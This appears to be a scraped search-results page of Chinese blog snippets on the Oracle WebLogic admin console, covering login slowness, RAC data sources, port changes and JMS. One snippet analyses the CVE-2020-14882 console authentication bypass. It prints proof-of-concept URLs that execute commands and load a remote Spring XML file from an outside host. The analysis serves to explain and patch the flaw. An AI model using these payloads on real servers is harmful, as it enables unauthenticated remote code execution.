精华内容
下载资源
问答
  • 原文地址weblogic控制台登录很慢 作者:paomananshan 实际是JVM在Linux下的bug  他想调用一个随机函数  但取不到  暂时的解决办法是  1)较好的解决办法: 在...

     

    分类: Oracle

    原文地址:weblogic控制台登录很慢 作者:paomananshan

    实际是JVM在Linux下的bug

      他想调用一个随机函数


      但取不到


      暂时的解决办法是


      1)较好的解决办法: 在Weblogic启动参数里添加 “-


      Djava.security.egd=file:/dev/./urandom” (/dev/urandom 无法启动)


      2)最差的解决办法: 执行命令 mv /dev/random /dev/random.ORIG ; ln /dev/urandom /dev/random


      将/dev/random 指向/dev/urandom


      3)最好的解决办法:  修改Linux上Weblogic使用的jdk $JAVA_HOME/jre/lib/security/java.security 文件


      将securerandom.source=file:/dev/urandom 修改为


      securerandom.source=file:/dev/./urandom


      这样可以解决任何一个域Weblogic启动慢的问题

    转载于:https://www.cnblogs.com/lcword/p/8017295.html

    展开全文
  • 步骤一:weblogic管理节点创建后,使用管理节点地址登录控制台。 步骤二:输入用户密码后进入控制台主菜单,点击services-data sources 步骤三:点击“Lock & Edit”解锁编辑,添加数据源名称,信息填...

    工具/原料

    • weblogic 10.3.6.0

    • centos 7.4

    方法/步骤

    步骤一:weblogic管理节点创建后,使用管理节点地址的登录控制台。

    步骤二:输入用户密码后进入控制台主菜单,点击services-data sources

    步骤三:点击“Lock & Edit”解锁编辑,添加数据源名称,信息填好后“next”

    步骤四:选择oracle数据库的驱动类型,如图两个上面一个是单实例,下一个为RAC,我们选择RAC集群,next

    步骤五:此步为事务处理选项,保持默认

    步骤六:此步骤填写数据源的关键信息,主要包括实例名,oracle主机ip,端口,用户名和密码,因为rac有两个ip地址,此步骤我们随便填写一个,在下个步骤中,可以修改jdbc串进行修改。

     

     

    步骤七:如图会根据上面填写的信息生成信息,红框中的信息目前不正确,修改如下jdbc信息,然后复制替换红框中的信息(加粗信息需据实修改)

    jdbc:oracle:thin:@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST = 10.12.76.100)(PORT = 1521))(ADDRESS = (PROTOCOL = TCP)(HOST = 10.12.76.101)(PORT = 1521))(LOAD_BALANCE = ON)(FAILOVER = ON))(CONNECT_DATA =(SERVICE_NAME = scsbccx)(FAILOVER_METHOD =(TYPE = SESSION)(METHOD = BASIC))))

    步骤八:点击test configuration,如图测试成功,后续步骤和单实例数据源相同

    步骤九:跟数据源选择目标,即我们之前创建的服务集群,最后点击完成并激活配置即可。

     

     

     

    展开全文
  • 登录地址是: http://管理实例IP:端口号/console 其中,管理实例的IP或者是管理实例所在主机的主机名 端口号默认7001 因此通过http://localhost:7001/console可以访问控制台、图形化界面, 之后登录,界面如...

    1.控制台的登录

    登录地址是:

    http://管理实例IP:端口号/console

    其中,管理实例的IP或者是管理实例所在主机的主机名

              端口号默认7001

    因此通过http://localhost:7001/console可以访问控制台、图形化界面,

    之后登录,界面如下图。

    二、启动管理的方法

    {注意:访问这个控制台,必须先启动管理服务器,

    startweblogic.cmd(windows)、startweblogic.sh(linux、unix)。}

    (一):

    进入到创建的域的目录C:\bea\user_projects\domains\mydomain\下,找到startweblogic.cmd,双击运行即可

    (二):打开开始菜单->程序->Bea WebLogic platform 8.1->user project->mydomain->start server,启动WebLogic控制台。

     

    三、控制台进入后左侧任务栏不显示问题

    点击Sign in进入,

    左侧任务栏不显示,可将浏览器模式改为兼容模式即可。

    修改后,左侧显示正常

     如果还是不可以,在java控制面板中的安全选项中添加信任的站点即可。

     

    转载于:https://www.cnblogs.com/xiaoxiaoweng/p/7268787.html

    展开全文
  • 简介weblogic 管理控制台需要用户名和密码去登录,但是通过该漏洞,可以绕过登录校验,直接进入后台访问weblogic的各种资源。补丁diff在这里我的weblogic版本为12.2.1.4,其他版本都大同小异。下面我们看一下补丁...

    简介

    weblogic 管理控制台需要用户名和密码去登录,但是通过该漏洞,可以绕过登录校验,直接进入后台访问weblogic的各种资源。

    补丁diff

    在这里我的weblogic版本为12.2.1.4,其他版本都大同小异。下面我们看一下补丁diff结果。

    3994bdd94aa1ae13bff1f85e451b7468.png

    因为这个类是weblogic从http访问的处理类,直接禁止url是否包含危险字符,如果包含,则直接退出。修复方案简单粗暴,不得不佩服。危险字符主要有以下几个。

    private static final String[] IllegalUrl = new String[]{";", "%252E%252E", "%2E%2E", "..", "%3C", "%3E", ""};

    weblogic 管理控制台权限控制分析

    要分析这个洞,首先我们需要了解一下,登录weblogic管理控制台的权限控制。

    在处理url的weblogic.servlet.internal.WebAppServletContext#doSecuredExecute方法中,调用如下的代码去判断权限等一切有关于安全的内容。代码如下。

    if(context.getSecurityManager().checkAccess(req, rsp, applyAuthFilters, false)) {if(s != null) {int count = ((SessionSecurityData)s).getConcurrentRequestCount();if(maxConcurrentRequestsAllowed != -1 && count > maxConcurrentRequestsAllowed) {context.logError("Rejecting request since concurrent requests allowable limit exceeded :"+ maxConcurrentRequestsAllowed);rsp.sendError(500);return;}}

    在weblogic.servlet.security.internal.WebAppSecurity#checkAccess(HttpServletRequest, HttpServletResponse, boolean, boolean, boolean)中,判断是否所有url都需要权限。当然,访问静态资源肯定是不需要登陆的,可能是为了浏览器兼容性考虑,因为大部分浏览器在登陆后,对访问静态资源都会添加cookie头,只有个别浏览器不会。

    所以weblogic将会根据访问的url,也就是是否为静态资源,去返回一个ResourceConstraint对象。该对象描述了该url访问的资源的详细权限信息。

    ResourceConstraint resourceConstraint = checkAllResources ? Holder.ALL_CONSTRAINT : this.getConstraint(request);authorized = this.delegateModule.isAuthorized(request, response, resourceConstraint, applyAuthFilters)

    然后调用weblogic.servlet.security.internal.SecurityModule#isAuthorized方法,在该方法中获取用户session,调用weblogic.servlet.security.internal.ChainedSecurityModule#checkAccess方法做进一步权限校验。

    最后会在weblogic.servlet.security.internal.CertSecurityModule#checkUserPerm中调用weblogic.servlet.security.internal.WebAppSecurity#hasPermission方法,根据最开始生成的ResourceConstraint对象,判断该次http请求是否有权限。如图所示 。

    bdbedc834f58b42fa1933fa13e3643b7.png

    如果用户访问的是静态资源,则返回unrestricted的值,hasPermission返回为true,weblogic认为你有权限访问,于是就会放行。如果你访问非静态权限,则直接拦截你的请求,重定向至登陆页。

    于是绕过登录的关键在于,怎么访问正常的资源,但是weblogic返回的是静态资源的ResourceConstraint对象。

    权限绕过分析

    我们回到最开始的。

    ResourceConstraint resourceConstraint = checkAllResources ? Holder.ALL_CONSTRAINT : this.getConstraint(request)

    跟入weblogic.servlet.security.internal.WebAppSecurityWLS#getConstraint(java.lang.String, java.lang.String)

    ResourceConstraint rcForAllMethods = consForAllMethods == null ? null : (ResourceConstraint)consForAllMethods.get(relURI);

    在这里会调用weblogic.servlet.utils.StandardURLMapping#get去根据url,返回对应的ResourceConstraint对象。

    public Object get(String path) {path = path.length() == 0 ? "/": this.cased(path);Object value = null;if((value = this.getExactOrPathMatch(path)) != null) {returnvalue;} else{return(value = this.getExtensionMatch(path)) != null ? value : this.getDefault();}}

    首先调用getExactOrPathMatch方法,也就是根据url,匹配是否在静态资源列表中。

    e1439da489e696b17819b7dd17b0de56.png

    而%252E%252E%252F恰好是../的url二次编码结果。这样既可以返回静态资源的ResourceConstraint对象,又不会影响正常访问。

    weblogic 二次编码原因

    在poc中我们可以看到,../被二次编码了。下面我们来分析一下weblogic能解开的原因。

    根据http规定,url部分,需要url编码后发送给服务器。服务器正常解开并继续处理。这是第一层url编码

    第二层编码的处理,在com.bea.netuix.servlets.manager.UIServletInternal#getTree中。

    public static UIControl getTree(String requestPattern, UIContext ctxt, boolean setContentType, ResolvedLocale resolvedLocale) throws IOException, ServletException {HttpServletRequest request = ctxt.getServletRequest();HttpServletResponse response = ctxt.getServletResponse();requestPattern = URLDecoder.decode(requestPattern, containerServices.getWebappServices().getServerDefaultEncoding());

    其中URLDecoder.decode会对第一次编码后的url做第二次解码的工作,当然,如果url还存在url编码的话。

    这也就是为什么两次编码可以绕过的原因。

    一次url编码为什么不可以绕过?因为经过服务器一次解码后,在weblogic.servlet.utils.StandardURLMapping#get处,无法匹配到静态资源。会被还原成原本的url,所以无法绕过。。大家有机会可以看一下weblogic.utils.collections.MatchMap#match关于查找的代码。

    POC

    weblogic 12

    http://127.0.0.1:7001/console/css/%2e%2e%2fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22);

    因为com.tangosol.coherence.mvel2.sh.ShellSession这个gadget,只存在于weblogic 12,weblogic10 并没有这个gadget(没有包),所以无法使用。

    weblogic 10

    因为weblogic 10没有相关gadget所以会报错,如图 。

    1f4c8fd1d3ac864edb4e286827bddcb8.png

    需要使用com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

    poc如下。

    http://127.0.0.1:7001/console/css/%2e%2e%2fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.184.1:8000/spel.xml")

    参考

    https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

    展开全文
  • 新建了weblogic domain,然后启动,通过开始菜单的打开console控制台会在浏览器中使用电脑名称而不是IP地址,例如:http://jack:7001/console。 这样的话,即使输入正确的用户名、密码也不能登录;把计算机名称改成...
  • weblogic jms

    2016-08-25 11:14:01
    控制台:http://localhost:7001/console 如何在weblogic上配置JMS服务(MOM): 1.启动数据库   2.启动weblogic   3.启动浏览器,在地址栏输入http://localhost:7001/console。在登录界面输入用户名和密码进入...
  • WebLogic使用记录

    2018-12-30 11:02:54
    修改Weblogic访问地址 weblogic服务器的默认访问地址为你IP+配置的端口/console (示例:192.168.1.1:7070/console); 修改控制台上下文路径即可   修改weblogic登录密码 选择左边菜单安全领域 修改为...
  • 目录一、前言二、准备...再次确认控制台登录密码第九步:直接【回车】第十步:为域选择模式配置第十一步:直接【回车】第十二步:选择管理服务器第十三步:直接【回车】第十四步:直接【回车】(这里是修改监听地址...
  • weblogic数据源和应用部署

    千次阅读 2017-12-01 15:03:11
    在装好weblogic10后,点击启动“”startWebLogic“”的cmd文件,一般建议创建快捷方式到桌面上 2 在命令窗口显示: 时代表weblogic服务器...打开控制台登录页面,输入创建weblogic时创建的用户名和密码 点击登录
  • weblogic 设置域名

    千次阅读 2016-06-24 21:55:01
    2. 登录控制台,修改默认端口为80,这时直接输入IP地址即可进行项目访问。 3. 通过控制台新建虚拟主机配置域名,如下:  如果我有2个项目发布在一台服务器上project1和project2。分别由不同的域名访问。...
  • 一、访问控制台 默认地址:http://localhost:7001/console/,点击【环境】-【服务器】-【AdminServer(管理)】 二、点击AdminServer,如下图: 如果你仅仅需要把默认的端口更换掉,那么把上图中的7001更改为你...
  • 1,在jms模块创建队列,网页登录weblogic控制台,点击服务-消息传送,jms模块。可以新建jms模块使用2,新建jms模块,命名后选择其目标服务器后完成3,点击新建的jms模块,选择新建资源类型,这里就是选择队列单击...
  • Oracle P6 HTTPS配置

    2021-02-20 14:06:48
    1.登录weblogic控制台 2.选中一个Server单击进入 !!!修改配置前,先点击左侧的锁定并编辑 3.在【配置】–【一般信息】选项卡,勾选启用SSL监听端口 这里的端口就是你HTTPS访问的端口,例如SSL监听端口为7002,...
  • java源码包---java 源码 大量 实例

    千次下载 热门讨论 2013-04-18 23:15:26
     当用户发送第一次请求的时候,验证用户登录,创建一个该qq号和服务器端保持通讯连接得线程,启动该通讯线程,通讯完毕,关闭Scoket。  QQ客户端登录界面,中部有三个JPanel,有一个叫选项卡窗口管理。还可以更新...
  • java源码包2

    千次下载 热门讨论 2013-04-20 11:28:17
     当用户发送第一次请求的时候,验证用户登录,创建一个该qq号和服务器端保持通讯连接得线程,启动该通讯线程,通讯完毕,关闭Scoket。  QQ客户端登录界面,中部有三个JPanel,有一个叫选项卡窗口管理。还可以更新...
  • java源码包3

    千次下载 热门讨论 2013-04-20 11:30:13
     当用户发送第一次请求的时候,验证用户登录,创建一个该qq号和服务器端保持通讯连接得线程,启动该通讯线程,通讯完毕,关闭Scoket。  QQ客户端登录界面,中部有三个JPanel,有一个叫选项卡窗口管理。还可以更新...
  • 数字证书:从文件中读取数字证书,生成文件输入流,输入文件为c:/mycert.cer,获取一个处理X.509证书的证书工厂…… Java+ajax写的登录实例 1个目标文件 内容索引:Java源码,初学实例,ajax,登录 一个Java+ajax写的...
  • JAVA上百实例源码以及开源项目

    千次下载 热门讨论 2016-01-03 17:37:40
     当用户发送第一次请求的时候,验证用户登录,创建一个该qq号和服务器端保持通讯连接得线程,启动该通讯线程,通讯完毕,关闭Scoket。  QQ客户端登录界面,中部有三个JPanel,有一个叫选项卡窗口管理。还可以更新...
  • 数字证书:从文件中读取数字证书,生成文件输入流,输入文件为c:/mycert.cer,获取一个处理X.509证书的证书工厂…… Java+ajax写的登录实例 1个目标文件 内容索引:Java源码,初学实例,ajax,登录 一个Java+ajax写的...
  • 数字证书:从文件中读取数字证书,生成文件输入流,输入文件为c:/mycert.cer,获取一个处理X.509证书的证书工厂…… Java+ajax写的登录实例 1个目标文件 内容索引:Java源码,初学实例,ajax,登录 一个Java+ajax写的...
  • java源码包

    2015-12-01 16:29:37
     当用户发送第一次请求的时候,验证用户登录,创建一个该qq号和服务器端保持通讯连接得线程,启动该通讯线程,通讯完毕,关闭Scoket。  QQ客户端登录界面,中部有三个JPanel,有一个叫选项卡窗口管理。还可以更新...

空空如也

空空如也

1 2
收藏数 23
精华内容 9
关键字:

weblogic控制台登录地址